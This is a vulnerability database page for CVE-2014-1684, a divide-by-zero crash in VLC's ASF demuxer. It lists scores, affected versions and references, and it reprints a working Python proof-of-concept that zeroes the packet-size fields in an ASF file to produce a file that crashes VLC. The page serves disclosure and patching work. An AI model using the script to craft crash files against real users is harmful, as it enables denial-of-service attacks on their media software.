CVE-2014-1684 Detail

CVE-2014-1684

EPSS

56.14%V3

Vector

Network

Published

2014-03-03
15h00 +00:00

Modified

2017-06-30
14h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The ASF_ReadObject_file_properties function in modules/demux/asf/libasf.c in the ASF Demuxer in VideoLAN VLC Media Player before 2.1.3 allows remote attackers to cause a denial of service (divide-by-zero error and crash) via a zero minimum and maximum data packet size in an ASF file.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-189	Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	4.3		AV:N/AC:M/Au:N/C:N/I:N/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 31429

Publication date : 2014-02-04 23h00 +00:00
Author : Saif
EDB Verified : No

#!/usr/bin/python # VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer # VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size # is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2 # to run this script you need to install python bitstring module # usage you supply any valid asf and the script will produxe a POC asf that will crash vlc import sys from bitstring import BitArray f = open(sys.argv[1],'r+b') f.seek(0,2) size = f.tell() print "[*] file size: %d" % size f.seek(0,0) print "[*] ReeeeeWWWWWWiiiiiNNNNNNND" fb = BitArray(f) index = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True) print "[*] found file properties GUID" print "[*] File properties GUID: %s" % fb[index[0]:(index[0]+128)] # index of minumum packet size in File Proprties header i_min_data_pkt_size = index[0] + 736 print "[*] Original Minimum Data Packet Size: %s" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex print "[*] Original Maximum Data Packet Size: %s" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex # Accroding to ASF standarad the minimum data size and the maximum data size should be equal print "[*] Changing Miniumum and Maximum Data packet size to 0" # changing the data packets in bit array fb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00 fb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00 fb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00 fb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00 fb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00 fb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00 fb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00 fb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00 print "[*] POC File Created poc.asf" of = open('poc.asf','w+b') fb.tofile(of) of.close() f.close()

Products Mentioned

Configuraton 0

Videolan>>Vlc_media_player >> Version To (including) 2.1.2

Videolan>>Vlc_media_player >> Version - (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99a (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99b (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99c (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99d (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99e (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99f (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99g (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99h (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.1.99i (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.50 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.60 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.61 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.62 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.63 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.70 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.71 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.72 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.73 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.80 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.81 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.82 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.83 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.90 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.91 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.2.92 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.3.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.3.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.3-ac3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.4 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.5 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.4.6 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.5.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.5.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.5.1a (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.5.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.5.3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.6.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.6.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.6.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.7.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.7.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.7.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.4 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.4a (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.5 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6a (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6b (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6c (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6d (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6e (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6f (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6g (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6h (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.6i (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.8.1337 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.4 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.5 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.6 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.8a (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.9 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.9a (Open CPE detail)
Videolan>>Vlc_media_player >> Version 0.9.10 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.4 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.5 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.0.6 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.4 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.4.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.5 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.6 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.6.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.7 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.8 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.9 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.10 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.10.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.11 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.12 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.13 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.2 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.3 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.4 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.5 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.6 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.7 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.8 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.0.9 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.1.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.1.1 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 2.1.2 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.0

Videolan>>Vlc_media_player >> Version 1.0.0 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.1

Videolan>>Vlc_media_player >> Version 1.0.1 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.2

Videolan>>Vlc_media_player >> Version 1.0.2 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.3

Videolan>>Vlc_media_player >> Version 1.0.3 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.4

Videolan>>Vlc_media_player >> Version 1.0.4 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.5

Videolan>>Vlc_media_player >> Version 1.0.5 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.0.6

Videolan>>Vlc_media_player >> Version 1.0.6 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.0

Videolan>>Vlc_media_player >> Version 1.1.0 (Open CPE detail)
Videolan>>Vlc_media_player >> Version 1.1.0 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.1

Videolan>>Vlc_media_player >> Version 1.1.1 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.2

Videolan>>Vlc_media_player >> Version 1.1.2 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.3

Videolan>>Vlc_media_player >> Version 1.1.3 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.4

Videolan>>Vlc_media_player >> Version 1.1.4 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.4.1

Videolan>>Vlc_media_player >> Version 1.1.4.1 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.5

Videolan>>Vlc_media_player >> Version 1.1.5 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.6

Videolan>>Vlc_media_player >> Version 1.1.6 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.6.1

Videolan>>Vlc_media_player >> Version 1.1.6.1 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.7

Videolan>>Vlc_media_player >> Version 1.1.7 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.8

Videolan>>Vlc_media_player >> Version 1.1.8 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.9

Videolan>>Vlc_media_player >> Version 1.1.9 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.10

Videolan>>Vlc_media_player >> Version 1.1.10 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.10.1

Videolan>>Vlc_media_player >> Version 1.1.10.1 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.11

Videolan>>Vlc_media_player >> Version 1.1.11 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.12

Videolan>>Vlc_media_player >> Version 1.1.12 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 1.1.13

Videolan>>Vlc_media_player >> Version 1.1.13 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.0

Videolan>>Vlc_media_player >> Version 2.0.0 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.1

Videolan>>Vlc_media_player >> Version 2.0.1 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.2

Videolan>>Vlc_media_player >> Version 2.0.2 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.3

Videolan>>Vlc_media_player >> Version 2.0.3 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.4

Videolan>>Vlc_media_player >> Version 2.0.4 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.5

Videolan>>Vlc_media_player >> Version 2.0.5 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.6

Videolan>>Vlc_media_player >> Version 2.0.6 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.7

Videolan>>Vlc_media_player >> Version 2.0.7 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.8

Videolan>>Vlc_media_player >> Version 2.0.8 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.0.9

Videolan>>Vlc_media_player >> Version 2.0.9 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.1.0

Videolan>>Vlc_media_player >> Version 2.1.0 (Open CPE detail)

Videolan>>Vlc_media_player >> Version 2.1.1

Videolan>>Vlc_media_player >> Version 2.1.1 (Open CPE detail)

References

http://git.videolan.org/gitweb.cgi/vlc.git/?p=vlc.git%3Ba=commitdiff%3Bh=98787d0843612271e99d62bee0dfd8197f0cf404
Tags : x_refsource_CONFIRM

https://trac.videolan.org/vlc/ticket/10482
Tags : x_refsource_CONFIRM

http://www.elsherei.com/?p=269
Tags : x_refsource_MISC

https://security.gentoo.org/glsa/201603-08
Tags : vendor-advisory, x_refsource_GENTOO

CVE-2014-1684 : Detail

CVE-2014-1684

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 31429

Products Mentioned

Configuraton 0

References